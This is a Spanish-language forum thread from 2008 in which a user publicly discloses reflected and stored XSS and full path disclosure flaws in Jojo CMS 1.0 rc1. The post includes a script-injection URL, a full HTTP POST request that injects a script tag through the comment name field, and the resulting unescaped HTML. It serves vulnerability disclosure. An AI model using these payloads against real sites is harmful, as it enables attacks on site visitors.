[UP] Jojo cms XSS y FPD

Iniciado por s E t H, 12 Noviembre 2008, 20:56 PM

0 Miembros y 1 Visitante están viendo este tema.

s E t H

es un cms que recien esta naciendo, pero como no me contestaron lo publico:




Nombre: Jojo cms
Web: http://www.jojocms.org/
Version: 1.0 rc1
Reporte: http://bugs.jojocms.org/details/task134
Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00
Parcheado: no
Tipo de vulnerabilidad: XSS y FPD



Cross site scripting (non-persistent) and Full path disclosure:
http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E


Cross site scripting (persistent):
http://demo.jojocms.org/blog/1/welcome-to-jojocms/


HTTP HEADERS (I injected in 'name' variable):

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E

RESULT:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>




sorry, my english is not good :(


Eazy

aham, y que es FPD?, Aparte esto no va en "Recopilacion de bugs de XSS/SQL i" ?
[/url]

s E t H

fpd: full path disclosure

no va en ese post, me fije y dice que para cms hay que abrir otro tema

Eazy

Aguante sEtH =D, nice (No sabia las siglas FPD) =D
[/url]